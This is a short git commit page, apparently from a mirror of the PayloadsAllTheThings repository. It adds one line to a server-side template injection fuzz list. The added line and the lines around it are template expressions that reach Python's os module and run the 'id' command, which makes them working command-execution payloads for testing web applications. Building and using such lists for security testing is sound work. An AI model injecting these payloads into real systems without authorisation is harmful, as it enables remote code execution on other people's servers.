1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-28 05:46:06 +02:00

Update ssti.fuzz

This commit is contained in:
p0dalirius 2021-10-04 09:21:10 +02:00
parent bdab385cfb
commit b0f90090c1

View File

@ -55,3 +55,4 @@ ${self.template.module.runtime.util.os.system("id")}
${self.module.filters.compat.inspect.os.system("id")}
${self.module.runtime.compat.inspect.os.system("id")}
${self.module.runtime.exceptions.util.os.system("id")}
${self.template.__init__.__globals__['os'].system('id')}